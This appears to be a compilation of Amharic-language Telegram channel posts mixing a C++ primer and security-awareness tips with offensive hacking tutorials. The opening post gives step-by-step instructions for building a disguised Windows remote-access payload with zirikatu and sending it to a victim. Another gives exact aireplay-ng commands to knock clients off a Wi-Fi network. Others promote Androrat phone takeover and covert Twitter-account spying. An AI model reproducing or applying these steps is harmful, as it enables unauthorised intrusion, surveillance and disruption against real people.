How to hack windows computer using kali linux?
ዉድ የዚ group ተከታታዮች በባለፈው post ላይ እንዴት kali linux operating system እንደምንጭን አይተን ነበር አሁን ደሞ kali linux operating system በመጠቀም እንዴት የwindows operating system hack ማድረግ እንደምንችል እናያለን::
Requirements
—> Kali linux os
—> zirikatu script shell
Let’s start
>በመጀመሪያ zirikatu script shell file download ማረግ እና kali linux Desktop ላይ ማስቀመጥ
>በመቀጠል ፎልደሩን መክፈት
>ከዛ ፎልደሩ ዉስጥ ባዶ ቦታ ላይ right click በማድረግ open terminal የሚለዉን ምርጫ መምረጥ ከዛም አዲስ የtermina windows ይከፈታል
>Type “ls” without quotations hit enter
>Type “chmod +x zirikatu.sh” without quotations hit enter
>Type “./zirikatu.sh” without quotations hit enter
>Select a payload number የሚለው ምርጫ ጋር Type “1” without quotations and hit enter
>Set Lhost: የሚለው ምርጫ ጋር የኮምፒተሩን ip address ማስገባት
>የኮምፒተሩን ip address ለማወቅ ከፈለግን አዲስ terminal ከፍተን ipconfig ብለን በመጻፍ ማወቅ እንችላለን
>Set lport: የሚለው ምርጫ ጋር Type “4444” without quotations and hit enter
>Do you want to change the payload icon? የሚለው ምርጫ ጋር Type “n” without quotations and hit enter
>Display an error message? የሚለው ምርጫ ጋር Type “n” without quotations and hit enter
>Enter the output file name: የሚለው ምርጫ ጋር Type “update” without quotations and hit enter
>Do you start the payload handler? የሚለው ምርጫ ጋር Type “y” without quotations and hit enter
የሰራነዉን payload download ያረግነው ፎልደር ዉስጥ output የሚል ፎልደር ዉስጥ እናገኘዋለን::
ከዚ በኋላ ሁሉም ነገር ዝግጁ ሆኗል ማለት ነው ስለዚ የሰራነዉን payload hack ማረግ ለምንፈልገው ሰው መላክ ብቻ ነው ሚጠበቅብን:: hack ሚደረገው ሰው ልክ ፋይሉን ሲከፍተው እኛ የ ኮምፒተሩ ሙሉ access ይኖረናል ማለት ነው::
ሆኖም ግን ተጠቂው update የሆነ anti-virus ካለው የምንልክለትን payload anti-virusሱ በቀላሉ ሊያጠፋብን ይችላል:: ብዙዎቹን anti-virus ሞክሬያቸዋለው የ windows 10 update የሆነው windows defender ብቻ detect አርጎታል:: በሌላኛው ፖስቴ እሱን ማለፍ የሚያስችል ዘዴ ይዤ እንደምቀርብ ተስፋ አረጋለው::

ሰላም 🙌🙌🙌
What is programming language ?
➡️ 1. ፕሮግራሚንግ ላንጉጅ ምንድን ነው?(what is programming language)
መጀመርያ programming language የሚለው ነገር ከማየታችን በፊት
➡️ 1.1 ፕሮግራም ምንድን ነው(what is programm) የሚለውን እንመልከት
ፕሮግራም ማለት በአጭሩ አንድን ነገር ለመሥራት ወይም ውጤት(output)ለማግኘት በቅድሚያ የምንፅፋቸው ነገሮች ሥብሥብ ፕሮግራም ይባላል።
ለምሣሌ
ካርድ ለመሙላት *805*....# call እንደምንለው ማለት ነው ፤ከዛ ያሥገባነው ቁጥር ትክክል ከሆነ Dear Customer, your prepaid account has been recharged succesfully የሚል text ይደርሠናል ማለት ነው። ቁጥሩን ግን በምታስገቡበት ጊዜ መሰላል ብትረሱ አልያም የኮከብ ምልክት ወይም ደግሞ ከምትሞሉት የካርድ ቁጥር አንድ ዲጂት ቢጎድል ሲስተሙ አይሰራም
ልክ እንደዚው ፕሮግራማችንም ትክክል ከሆነ ውጤት(output) እናገኛለን ካልሆነ ደግሞ ሥህተት ነው ይላል ማለት ነው።
🖌ለምሣሌ ፦ከታች ያለውን ፕሮግራም እንመልከት
# include <iostream>;
using namespace std;
int main( )
{
cout<<" HI ATC "<<endl;
return 0;
}
💻output : HI ATC
ይህ ከላይ በ እንግሊዘኛ የተፃፋው ምሣሌ" HI ATC " የሚለውን ፅሁፍ screenu ላይ ያሣየናል ሥለዚህ ይህንን ነገር ፕሮግራም እንለዋለን ማለት ነው።
ከላይ ባለው ምስል ላይ የመጀመሪያዎቹ ሁለት መስመሮች ማንኛውም የ C++ code በምትሰሩበት ጊዜ የምትጠቀሟቸው ሲሆን የምታስገቡትን ኮድ ኮምፓይለራቹህ እንዲረዳው የሚረዱ መቅረት የሌለባቸው ነገሮች ናቸው።
ከላይ ያለውን ፕሮግራም run በምታደርጉበት ወቅት ኮምፒውተራቹው ላይ HI ATC የሚል out put ይመጣላቹሃል
cout<< ____ ; ተብሎ የሚገባ ማንኛውም አይነት data ፕሮግራሙን ጨርሳቹህ run ስታደርጉ ኮምፒውተራቹህ ላይ ይወጣል ማለት ነው
int main( ) የሚለው የምታስገቡት ነገር በሙሉ integer መሆኑን ለኮምፓይለሩ ያሳውቀዋል
The syntax for preprocessor directive statement is
#include<headerfilename.h>
The .h extension tells the compiler that the file is header file. The preprocessor directive
statement instructs the compiler to bring all the contents of the header file to our program.
Some of the header files that we are going to use are:
⚠ iostream.h: - contains standard input and output functions.Some of the functions defined ( እኛ ለምሳሌነት የተጠቀምነው የheader type ነው ሌሎችም ግን እሉ ለምሳሌ math.h የሚባል የሂደር አይነት አለ ጥቅሙም የምንሰራው ፕሮግራም ላይ Mathematical formulawoch like cosine,sine, tangent, quadratic equation...ወዘተ ሲኖሩ ይህንን እንጠቀማለን ለምሳሌ ካልኩሌተር መስራት ብትፈልጉ #include<math.h> የሚል መግቢያ መጠቀም ይኖርባቹሃል
here are:
Cin>>: is standard input function that accepts input from the user. Syntax:
For single input
Cin>>var1; // var ማለት ማንኛውም የምታስገቡት ነገር ማለት ነው
For multiple inputs
Cin>>var1>>var2>>var3; // የምታስገቧቸው inputs
Cin will take value from the keyboard and store it in the memory. Thus the cin statement needs a variable which is a reserved memory place holder.
Cout<<: standard output function that displays its content to the Screen.Syntax:
For single output
Cout<<Var1;
For multiple output
Cout<<var1<<”, “<<var2<<” and “<<var3;
<<endl: standard output function that displays a new line character
➡️ 1.2 ፕሮግራሚንግ ላንጉጅ ምንድን ነው ፦
ፕሮግራሚንግ ላንጉጅ ማለት የራሡ የሆነ የአፃፃፍ ህግ ያለው ሆኖ የምንጽፋቸው ችሮግራሞች የሚያሥተዳድር ማለት ነው።
🔍፦sorce code እኛየፃፍነው ፕሮግራም
🔍፦machine language ኮምፒውተር የሚረዳበት ቋንቋ ማለት ነው።
🔍!!!syntax(ሣይንታክሥ)
ከላይ ለመጥቀሥ እንደ ሞከርኩት
ፕሮግራሚንግ ላንጉጅ ማለት የራሡ የሆነ የአፃፃፍ ህግ አለው ይህ የአፃፃፍ ህግ ሣይንታክሥ(syntax)ይባላል።
Like አማርኛ ላይ ሠዋሠው እንግሊዝኛ ላይ ደግሞ ግራመር እንደምንለው ማለት ነው።
🖍ለምሣሌ ይህን ፕሮግራም እንመልከት እዚህ ላይ የተፃፋው እያንዳንዱ ነገር syntax መሠረት ያደረገ ነው።
# include <iostream>
using namespace std;
int main( )
{
cout<<" hello world"<<endl;
return 0;
}
ለምሣሌ አንድን አረፍተ ነገር ፅፈን ሥንጨርሥ ለአማርኛ አራት ነጥብ ፤ለእንግሊዝኛ አንድ ነጥብ(full stop)&ለ ፕሮግራሚንግ ላንጉጅ ደግሞ" ; " እንጠቀማለን ነገር ግን ሁሉም ፕሮግራሚንግ ላንጉጅ ማለት ሣይሆን አብዛኞቹ " ; "ይጠቀማሉ።
ሥለ ፕሮግራሚንግ ላንጉጅ(ቋንቋ) ይህን ያህል ካወራን በመቀጠል ዋና ዋና የሚባሉትን እንጥቀስ
🔰በአሁኑ ሠአት 🌏በአለማችን ላይ ብዙ አይነት እና ጥቅም ያላቸው ፕሮግራሚንግ ላንጉጅዎች አሉ ከነርሡም መካከል በዋናነት የሚጠቀሡት የሚከተሉት ናቸው🔰
1⃣.JS(javascript) 6⃣.C
2⃣.phyton 7⃣.C++
3⃣.Go(Go lang) 8⃣.C#
4⃣.Java 9⃣.CSS
5⃣.Php 🔟.html etc...
@betselotxo

Facebook አካውንት Hack እንዳይደረግ እንዴት ማድረግ እንደምንችል አሳያችኋለሁ😀
✔️መፍትሄውን እነሆ👇👇👇
1⃣.በመጀመሪያም ይህ መሆኑን እና አለመሆኑን ለማረጋገጥ አሁን step by step ተከታተሉኝ
💢Facebook ➡ seting ➡ Security and login ➡ Where you are logged in 👉 ላይ በመግባት በእናንተ አካውንት የገባ ሰው እንዳለና እንደሌለ ማወቅ ያስችላል።
⚠️Note: እራስዎ በሌላ #አፕ ከገቡም ያመጣልዎታል መርጠው መርጠው ነው።
✴️ ከዛም Terminate all other sessions ክሊክ በሉት፤ ይህ ሚጠቅመው በሌላ ስልክ 📱 የእናንተን #አካውንት የሚጠቀም ሰው ካለ remove ያደርገዋል።
2⃣.Security ደግሞ ለማጠናከር Setting ➡ Security and login ➡ Two Factor Authentication ➡ use two factor authentication ➡ ውስጥ በመግባት በስልካችሁ የሚላከውን Code በማስገባት ON ታረጉታላችሁ እሄም የሚጠቅመዉ Passwordachun እራሱ ቢያገኙት Facebookኩ ሚፈልገዉ Password ሳይሆን በስልካችሁ የሚላከዉን Code ነው ሚጠቀመዉ
✴️ ይህ👆 ጠንካራ የሚባለው #የፌስቡክ security ነው።
💢💢💢💢💢💢💢💢💢💢
⚠️መረጃዎችን ለወዳጅዎ 👥 ያጋሩ

Hi hi hi እንዴት ናቹ @A21hackers ነን በዛሬው ፖስቴ ደሞ ምንናየው እንዴት አርገን የwifi network connection ማቋረጥ እንደምንችል ነው::
እርግጠኛ ነኝ ብዙዎቻቹ wifi kill, netcut ወዘተ የሚባሉትን application በደብ ታቋቸዋላቹ ነገር ግን ሁሉም appዎች ግዴታ በተመሳሳይ network ላይ መሆን ይኖርብናል:: ዛሬ ግን ምናየው የwifi network connection connect ሳናደርግ እንዴት የwifi network connection ማቋረጥ እንደምንችል ነው::
Requirement
—> Kali linux os with wifi adapter
Procedure
—> Open terminal
—> Type “airmon-ng” and hit enter without quotation
—> Type “airmon-ng start ‘wifi interface name’ ”
eg. “airmon-ng start Wlan0” and hit enter without quotation
—> pid የሚል error ካጋጠማቹ Type “kill ‘pid number’”
eg. “kill 2484” and hit enter without quotation
—> Type “airodump-ng wlan0mon” and hit enter without quotation
—> ብዙ የwifi ዝርዝር ሲመጣላቹ የምትፈልጉት wifi መኖሩን check ካረጋቹ በኋላ hit “ctrl+c” key without quotation
—> ከሚዘረዘርላቹ wifi ዉስጥ የምትፈልጉትን wifi bssid mac address copy ማረግ
—> Type “airodump-ng wlan0mon -c <የ wifi channel number ማስገባት> —bssid <copy ያረጋችሁትን mac address past ማድረግ>
eg. “airodump-ng wlan0mon -c 6 —bssid 4E:29:3D:6C:EB:61” and hit “ctrl+c” key without quotation
—> Type “aireplay-ng -0 100 –a < copy ያረጋችሁትን mac address past ማድረግ> wlan0mon”
eg. “aireplay-ng -0 100 –a 4E:29:3D:6C:EB:61 wlan0mon” and hit enter witout quotation
አሁን ሁሉም client ከwifi access point ጋር ያላቸው connection ይቋረጣል ማለት ነው::

ኮምፒውተራች ላይ save የተደረገ የWIFI ፓስዎርደ እዴት ማወቅ እንችላለን
follow these steps 👇👇👇
1 CMD እንከፈታለን
2 netsh በለን ከፃፈን በህዋላ 'enter' እነካለን
3 wlan show profile በለን ከፃፈን በህዋላ 'enter' እነካለን
ከዛ የWIFI ስም ዘርዘር ይመጣል
4 wlan show profile WIFINAME key=clear በለን ከፃፈን በህዋላ 'enter' እነካለን
WIFINAME የሚለውን በፈለግነዉ WIFI ስም እንቀይራለን
ከዛ ስለ WIFI ሙሉ information አናገኛለን
ከምናገኘው ዉስጥ
Key content የሚለው ጋር የተፃፈው password ነው

🎭ብዙ ሀከሮች የአንድሮይድ ስልካችንን ለመጥለፍ ተመርጭ የሆነው መተግበሪያ Androrat ነው ይላሉ ።
🖥Androrat (Android Remote Administration Tool)፦በjava የተጻፈ ሲሆን በአንድ ኮምፒውተር አንድን የአንድሮይድ ሙሉ ለሙሉ ለመቆጣጠር ያስችላል።
🎱 ይህ መተግበሪያ የተሰራው ወላጆች ልጆቻቸውን የAndroid operating system እንዲቆጣጠሩ ነዉ ።
🖥የህ የኮምፒውተር መተግበሪያ (Androrat apk binder)የርሱ የሆኑ malaware program አለው
🖥(androrat apk binder )ታዋቂ ከሆነ ከአንድ አንድሮይድ አፕሊኬሽን ጋር (telegram,gallery...) የራሱን ማልዌር በማካተት የአንድሮይድ መተግበሪያ ዉሰጥ የራሱን ስራ ይሰራል
ምን ምን ሓክ (hacke)እናራጋለን 🔴ነገሮችን በዋነኝነት ሃክ ማረግ ይቻላል
🔴contactማስተካከል ,መሰረዝ ,መመዝገብ ይቻላል
🔴 በሰዉየዉ ስልክ ኢንተርኔትመጠቀም ይቻላል
🔴 vibrate ማረግ ይቻላል
🔴 ሚሴጅ ማንበብ ,መጻፍ
🔴 ስልኩ የለበትን ቦታ ማወቅ በGps ተጠቅመን
🔴 የስልኩን ፊተኛ እና የሗላ ኮሜሪ video መቅዳት ወይንም live መቅዳት
🔴 ፎቶ ማንሳት
🔴 በሰዉየዉ ስልክ መደወል
🔴 ድምጽ መቅዳተ እንችላለን

ሀከሮች ”ʜᴀᴄᴋᴇʀ” በቀላል የሀኪግ ”ʜᴀᴄᴋɪɴɢ” ስልት ተጠቅመው፣ የዕርሶን የግል ያልተፈቀዱ መረጃዎች ምን አልባትም እርሶ ለመግለጥ የማይፈልጉት መረጃዎችን ሊያውቁት ይችላሉ። በብዛት የተለመዱትን ወይም የሚታወቁትን የሀኪግ ስልቶች ለምሳሌ፦ ᴘʜɪsʜɪɴɢ፣ ᴅᴅᴏs፣ ᴄʟɪᴄᴋᴊᴀᴄᴋɪɴɢ ወዘተ… የመሳሰሉትን ለደህንነቶ ማወቁ የሚበጅ ነገር ነው።
ስነ-ምግባር የጎደለው ሀከሮች፣ የሲስተምን በሀሪያት በመለወጥ እና የፕሮግራም ክፍተቶቹን በመበዝበዝ ያልተፈቀደ መረጃን ለማግኘት የሚደረጉት ተግባር ህገ-ወጥ እንቅስቃሴ ተብሎ ሊጠራ ይችላል። ያልተፈቀዱ መዳረሻዎችን ለማግኘት ሀኪግ በርካታ እድሎችን ለሀከሮች በማቅረብ ሚስጥራዊ መረጃዎችን እንደ የክሬዲት ካር ዚርዝሮች፣ የኢሜል አድራሻ ዝርዝሮች እና ሌሎች የግል መረጃዎችን ለማወቅ ይችላሉ።
ስለዚህ፣ የእርስዎን የግል መረጃ ባልተፈቀደላቸው መንገድ ለማግኘት ብዙ ጊዜ ጥቅም ላይ የሚውሉ የሀኪግ ስልቶች አንዳንዶቹን ማወቅ ያስፈልጋል።
ᴋᴇʏʟᴏɢɢᴇʀ
ኪሎገር(ᴋᴇʏʟᴏɢɢᴇʀ) በቁልፍ ሰሌዳዎ ላይ የሚጫኑትን ቁልፎች እና የቁልፎችን ቅደም ተከተል የማስታወሻ መዝግብ ፋይል ውስጥ በኮምፒውተሮ ላይ ፅፎ የሚያስቀምጥ ቀላል ሶፍትዌር ነው። እነዚህ የማስታወሻ መዝግብ ፋይሎች ሌላው ቀርቶ የግል ኢሜል አድራሻ እና የይለፍ ቃሎችን”ᴘᴀssᴡᴏʀᴅs” የያዙ ሊሆን ይችላል።
የኦላይን ባንኪግ ”ᴏɴʟɪɴᴇ ʙᴀɴᴋɪɴɢ” ድረ-ገጾች የራሳቸውን ምናባዊ ሁለገብ የቁልፍ ሰለዶችን(ᴠɪʀᴛᴜᴀʟ ᴋᴇʏʙᴏᴀʀᴅs) አማራጭ እንድትጠቀሙ መስጠታቸው ዋነኛ ምክንያት ኪሎገር ነው።
ᴅᴇɴɪᴀʟ ᴏꜰ sᴇʀᴠɪᴄᴇ (ᴅᴏs/ ᴅᴅᴏs)
የአገልግሎት ክልከላ ጥቃት አንዱ የሀኪግ ስልት ሲሆን፣ ድረ-ገጽን ወይም ሰርቨርን(sᴇʀᴠᴇʀ) አገልግሎት መስጠት ኢዲያቆም በብዙ የአገልግሎት ጥያቄዎች በማጥለቅለቅ ሰርቨሩ ሁሉንም ጥያቄዎች በአንድ ጊዜ ውስጥ ማስተናገድ የማይችልበት ደረጃ በመፍጠር እና በመጨረሻም ተበላሽቶ ከጥቅም ውጭ ማድረግ ነው።
ሀከሮች ለᴅᴅᴏs ጥቃት ሲባል ብዙውን ጊዜ ቦትኔትን(ʙᴏᴛɴᴇᴛs) ወይም ዞምቢ(ᴢᴏᴍʙɪᴇ) ኮምፒውተሮችን በስራ ላይ ያውላሉ፣ እነዚህ ብቸኛው ስራቸው ለጥቃት በታቀደው ሲስተም ላይ በጥያቄ መልእክቶች ማጥለቅለቅ ነው።
ᴡᴀᴛᴇʀʜᴏʟᴇ ᴀᴛᴛᴀᴄᴋs
እርስዎ የዲስከቨሪ ወይም ናሽናል ጆግራፊ ቻናል ትልቅ አድናቂ ከሆኑ፣ የወተርሆል(ᴡᴀᴛᴇʀʜᴏʟᴇ) ጥቃትን በቀላሉ ልታገናኙት ትችላላቹ። ቦታዎችን መመረዝ፣ በዚህ ሁኔታ ውስጥ፣ ሀከሮች የጥቃት ኢላማ በሚያደረጉት በጣም ተደራሽ የሚሆነውን አካላዊ ክፍል ላይ ጉዳት ያደርሳሉ።
ለምሳሌ፦ አንድ ወንዝ ምንጭ ከተመረዘ፣ በበጋ ውቅት ሙሉ የእንስሳት ዝርያን ይጎዳል። በተመሳሳዩ ሀከሮች ደግሞ የሚፈልጉትን ለማጥቃት ለግኘት በጣም የቀረበውን አካላዊ ቦታን የጥቃት ኢላማ ያደርጋሉ። የዚህ ጥቃት ውስጥ ኢላማ የሚሆኑት የተወሰኑ ቡድኖች(ተቋም፣ ኢንዱስትሪ ወይም ክልል) ናቸው። በዚህ ጥቃት ውስጥ፣ ጥቃት አድራሽው የኤላማው ቡድኖች አብዝተው የሚጠቀሟቸውን ድረ-ገጾችን ይገምታል ውይም ይከታተላል እና አንድ ወይም ከዚያ በላይ የሚሆኑትን በማልዌር ”ᴍᴀʟᴡᴀʀᴇ” ያጠቃል። በመጨረሻም በኢላማው የተቀዱት ቡድን አባላት ይጠቃሉ።
ꜰᴀᴋᴇ ᴡᴀᴘ(ᴡɪʀᴇʟᴇss ᴀᴘᴘʟɪᴄᴀᴛɪᴏɴ ᴘʀᴏᴛᴏᴄᴏʟ)
ለቀልድ እንኳን፣ ሀከሮች የውሸት ገመድ-አልባ ግንኙነት መስመር የሚፈጥር ሶፍትዌር ሊጠቀሙ ይችላሉ። ይህ የተፈጠረው የውሸት ገመድ-አልባ ግንኙነት መስመር ከትክክለኛው ለህዝብ ይፋ ከሆነው ገመድ-አልባ ግንኙነት መስመር ቦታ ጋር ይገናኛል። አንዴ ከዚህ የውሸት ገመድ-አልባ ግንኙነት መስመር ጋር ግንኙነት ከፈጠራቹ፣ ሀከሮች መረጃቹን በሙሉ ማግኘት ይችላሉ። ልክ ከላይ በተጠቀሰው ሁኔታ አይነት።
ᴇᴀᴠᴇsᴅʀᴏᴘᴘɪɴɢ (ᴘᴀssɪᴠᴇ ᴀᴛᴛᴀᴄᴋs)
ከሌሎች በፈጥሮ ተፅኖዊ(ᴀᴄᴛɪᴠᴇ) ጥቃቶች በተለየ፣ ተፅኖ አልባ(ᴘᴀssɪᴠᴇ) ጥቃቶችን በመጠቀም፣ ሀከሩ ጥቂት የማያስፈልጉ መረጃዎችን ለማግኘት የኮምፒውተር ስርዐቶችን እና ኔትዎርኮችን ብቻ ይቆጣጠራሉ።
ከኢቭስድሮፒግ ጥቃት ጀርባ የሚኖረው ፍላጎት ሲስተምን ለማበላሸት አይደለም፣ ነገር ግን ሳይታወቅባቸው በጥንቃቄ ጥቂት መረጃዎችን ለማግኘት ነው።
ᴘʜɪsʜɪɴɢ
ፊሽግ አንዱ የሀኪግ ስልት ሲሆን፣ ሀከሩ በስፋት ተደራሽ ድረ-ገጾችን አስመስሎ የውሸት ድረ-ገጽ ኮርጆ ይሰራና የጥቃት ኢላማውን ለማጥመድ አትኩሮት መሳቢያ መልእክት በማካተት ሊንክ(ʟɪɴᴋ) ወይም ማስፈንጠሪያ ይልክለታል። ተጠቂው አንዴ ʟᴏɢɪɴ አድርጎ ለመግባት ሲሞክር ወይም የተወሰኑ ዴታዎችን ካስገባ፣ ሀከሩ የተጠቂውን የግል ድብቅ መረጃ በውሸቱ ድረ-ገጽ ላይ በሚሰራው ቶርጃን”ᴛʀᴏᴊᴀɴ” በመጠቀም ማግኘት ይችላል።
ᴠɪʀᴜs, ᴛʀᴏᴊᴀɴ ᴇᴛᴄ…
ቫይረሶች ወይም ቶርጃኖች አደገኛ የሶፍቴር ፕሮግራሞች ሲሆኑ፣ በተጠቂው ሲስተም ውስጥ ይጫኑና የተጠቂውን መረጃዎች ወደ ሀከሩ መላክ ይጀምራሉ።
ᴄʟɪᴄᴋᴊᴀᴄᴋɪɴɢ ᴀᴛᴛᴀᴄᴋs
ክሊክጃንኪግ በተጨማሪ በሌላ ስም ይታወቃል፣ ᴜɪ ʀᴇᴅʀᴇss። በዚህ ጥቃት፣ ሀከሩ ተጠቂው ሊነካው ወይም ክሊክ ሊያደረጋቸው የሚገቡ ትክክለኛ በይነገጾችን”ᴜsᴇʀ ɪɴᴛᴇʀꜰᴀᴄᴇ” ይደብቃል። በሌላ ቃል፣ጥቃት አድራሹ ተጠቂው ክሊክ በማድረግ በትክክል ሊያገኝ ያላቀደው ወደሆነ ድረ-ገፅ ውስጥ ይጠልፈዋል። ነገር ግን ሀከሩ ተጠቂው እንዲገባለት የሚፈልገው ድረ-ገጽ ነው።
ᴄᴏᴏᴋɪᴇ ᴛʜᴇꜰᴛ
ኩኪስ “ᴄᴏᴏᴋɪᴇs” በብራውዘሮች ወይም የድረ-ገጾች ማሰሻ ፕሮግራሞች ላይ ለምሳሌ፦ የጎበኘናቸው ድረ-ገጾች ማስታወሻ ወይም የአሰሳ ታሪክ፣ በተለያዩ ድረ-ገጾች ላይ የምንጠቀምባቸው የተጠቃሚነት ስም(ᴜsᴇʀɴᴀᴍᴇ) እና የይለፍ ቃሎች(ᴘᴀssᴡᴏʀᴅs) የመሳሰሉትን የግል ዴታዎችን መዝግቦ የሚይዝ ፕሮግራም ነው። ታዲያ ሀከሩ አንዴ የናንተን ኩኪስ ማግኘት ከቻለ፣ በራሳቹ ብራውዘር ላይ እራሱን እንደ እናንተ በማድረግ የተፈቀደለት ተጠቃሚ መሆኑን በማረጋገጥ በናተ ዴታ መጠቀም ይችላል።
ʙᴀɪᴛ ᴀɴᴅ sᴡɪᴛᴄʜ
ʙᴀɪᴛ እና sᴡɪᴛᴄʜ የሀኪግ ስልት በመጠቀም ፣ ሀከሩ ተንኮል አዘል ፕሮግራሞችን ያሰራጫል ታዲያ ግን ተጠቃሚዎች ትክክለኛ የተረጋገጠ ፕሮግራም እንደሆነ ያምናሉ። በዚህ መንገድ፣ ይህን ተንኮል አዘል ፕሮግራም በኮምፒውተራቹ ላይ ስትጭኑት፣ ሀከሩ በኮምፒውተራቹ ላይ ያልተፈቀደለትን መዳረሻ ፍቃድ ያገኛል። ኮፒ ራይት ጠብቁ

5 ኢሜይል ኣካውንታችን ሀክ ሲደረግ /
email/
ኢሜይል አካውንት በተለያዪ ምክንያቶች ሃክ ሊደርግ ይችላል
በዚህም ምክንያት በአጭበርባሪዎች እጅ ይወድቃል::
አጭበርባሪዎቹ ሀክ በተደረገ ኢሜይላችን ይገቡና: በብዛት ከማን
ጋር ኢሜይል እንደተላላክን: የተላላክነው የኢሜይል ይዘት ምን
ይመስላል? ሀክ የተደረገው ኢሜይል ባሌበት የት ነው
የሚኖረው? ወዘተ ይመረምሩታል:: ካዛማ አንድ አስደንጋጭ
ኢይሜይል በቅርበት ለምናውቀው ሰው መጻፍ ነዋ!
ለምሰሌ: አንድ በፈረንሳይ የሚኖር ሰዉ “ኤልያስ” ከአንድ ሌላ
ሀገር የሚኖር ሰዉ “ዘዉዱ” በኢሜይል ብዙ ጊዜ ያወራሉ:
በጣም ይቀራረባሉ እንበል::
አሁን የኤልያስ ኢሜይል “ሀክ” ተደረገ እንበል:: ሃከሩ እንዲህ
ብሎ ለዘዉዱ ኢሜይል ይጽፍለታል::
“እንዴት ነህ ? በጣም መጥፎ ገጠመኝ ነው ያጋጠመኝ::
ከፈረንሳይ ወደ ጀርመን ለአጭር ጉቡኝት ሂጃሎ:: ጀርመን
ውስጥ ያጋጠመኝ ነገር ግን በጣም አናድዶኛል:: ክሬዲት
ካርዴን: በእጄ የነበረው ካሽና ስልኬ ዘረፉኝ:: ነገር ግን እንደ
እድል ሆኖ ፓስፖርቴ ይዛሎ:: ፖሊስም ሆነ ኢምባሲ
እንዲያግዘኝ ብሞክረም ምንም ወፍ የለም:: በረራየ ደግሞ ነገ
ጥዋት ላይ ነው:: እና አሁን ያለሁበት ሆቴል ለተጠቀምኩበት
አገልግሎት ሂሳብ ካልከፈልኩ መዉጣት ስለማልችል : እባክህን
እርዳታህን በዚህ አስቸጋሪ ሰአት እፈልጋለሁኝ::
እባክህን ፈጥነህ ከዚህ አዉጣኝ,ኤልያስ”
ይህ ኢሜይል የደረሰዉ ዘዉዱ ደንገጥ ብሎ ገንዘብ ይልክ
ይሆን…?
መፍትሄ: እንዲዚህ አይነት መልእክት ያለው ኢሜይል
ከምናዉቀው ሰዉ ሲደርሰን መልሰን በተላከልን ኢሜይል መልስ
መስጠት የለብንም እንዲሁም ቸኩለን መክፈል የለብንም
ኢሜይሉ ሀክ ተደርጎ የሆናል ብለን በማሳብ እርዳታ የጠየቀንን
ሰዉ ማግኘት ያለብን ከኢሜይል ዉጪ ባሉ የመገናኛ ዜዴዎች
ተጠቅመን ማጠራት አለብን!
💥💥💥ተፈጸመ 💥💥💥
ጋይስ እንዴት ነበር ተማራችሁበት

🗃 What Is Hacking? 🗳
━━━━━━━━━━━━━
Hacking refers to activities that seek to compromise digital devices, such as computers, smartphones, tablets, and even entire networks. And while hacking might not always be for malicious purposes, nowadays most references to hacking, and hackers, characterize it/them as unlawful activity by cybercriminals—motivated by financial gain, protest, information gathering (spying), and even just for the “fun” of the challenge.
━━━━━━━━━━━━━
📲 @betselotxo💻

🗃 How Do Trojans Work? 🗳
━━━━━━━━━━━━━
Here’s a Trojan malware example to show how it works.
You might think you’ve received an email from someone you know and click on what looks like a legitimate attachment. But you’ve been fooled. The email is from a cybercriminal, and the file you clicked on — and downloaded and opened — has gone on to install malware on your device.
When you execute the program, the malware can spread to other files and damage your computer.
How? It varies. Trojans are designed to do different things. But you’ll probably wish they weren’t doing any of them on your device.
━━━━━━━━━━━━━
📲 @betselotxo 💻

How to Hack a Twitter Account
January 4, 2020
Twitter is one of the most popular microblogging sites at present and is used by individuals, businesses, academicians, and many other people. Other than tweets that are public, users also share private messages through it, which often has important information.
Have you ever wondered about how to hack a twitter account? To hack someone’s twitter profile, you often need username and password both. Do you wish to hack someone’s twitter account with just their username?
Whether you are worried about the phone usage of your kids or want to keep a check on your employees, having a handy solution to track twitter in a secure, stealth and affordable manner can be a true blessing.

☑️ ሀከር ምንድን ነዉ ?| Who is a Hacker
⏺ ሀከር ማለት አንድ ግለሰብ ወይም ቡድን አንድን ኮምፒዉተር ወይም የኮምፒዉተር ኔትወርክ ለራሱ ትርፍ ወይም ለመዝናናት ሰብሮ የሚገባ ነዉ።
♻️ የሀከር አይነቶች | Types of Hackers
ሀከሮች በሶስት ወሳኝ አይነቶች ይከፈላሉ :-
⚪️White Hat Hackers :-እነዚህ ሀከሮች የሀኪንግ እዉቀታቸዉን ተጠቅመዉ ህገወጥ የመረጃ ብርበራ የማያደርጉ ናቸዉ ስለዚህ ጥሩ ሀከሮች ነዉ የሚባሉት እንዲሁም Security expert በመባል ይታወቃሉ።
⚫️ Black Hat Hackers :-የነዚህ አይነት ሀከሮች ብዙ ጊዜ crackers ይባላሉ እነዚህ ሀከሮች የሀኪንግ እዉቀታቸዉን ተጠቅመዉ ህገወጥ ተግባራትን ያከናዉናሉ ለምሳሌ ልክ እነደ credit card ዘረፋ ባንኮችን ሀክ ማድረግ ወዘተ ክሬዲት ካርድ ዘረፋ ላይ የሚሳተፉ ሀከሮች ካርደር ይባላሉ ሌላ ጊዜ በሰፊዉ እንቃኛቸዋለን።
🔘 Grey Hat Hackers :-ግሬይ ሀት የምንላቸዉ በwhite hat እና በblack hat መካከል የሚገኙ hybrid ናቸዉ ይህም ማለት አንዳንዴ black hat አንዳነዴ ደሞ white hat ሀከርስ ይወላዉላሉ ማለት ነዉ
☑️ የሀከሮች ደረጃ | Hacker Hierarchy
❇️ Scriptkiddies :-እነዚህ የሀኪንግ ልምድ የሌላቸዉ ግለሰቦች / ቡድን ግን ሀከር መሆን የሚፈልጉ ናቸዉ ሀክ ለማድረግ የሚጠቀሙትም ready made tool ወይም የተዘጋጀ ሶፍትዌር ነዉ በዙ ጊዜም ልምድ ስለሌላቸዉ እራሳቸዉን harm ያደርጋሉ አንድ ታዋቂ ጥቅስ አለ "Little knowledge is dangerous" ይህም ብዙ ጊዜ የምናየዉ ችግር ነዉ።
❇️ Intermediate hackers :-ከscriptkiddies የበለጠ የሀኪንግ ልምድ እንዲሁም እዉቀት ያላቸዉ ሀከሮች ናቸዉ ግን የራሳቸዉን exploit ወይም የሀኪንግ ሶፍትዌር መስራት አይችሉም ቢሆንም ጥሩ ልምድ ያላቸዉ ሀከሮች ናቸዉ።
❇️ Professional or Elite hackers :-እነዚህ ልምድ ያላቸዉ ሀከሮች የራሳቸዉን exploit ወይም የሀኪንግ ሶፍትዌር መስራት ይችላሉ ስለሆነም የትኛዉም አይነት system ሰብረዉ መግባትና ራሳቸዉን የመደበቅ ልምድ አላቸዉ።
🖥 ሀከር ለመሆን ምን ይጠበቅብናል?| What Takes to Become a Hacker?
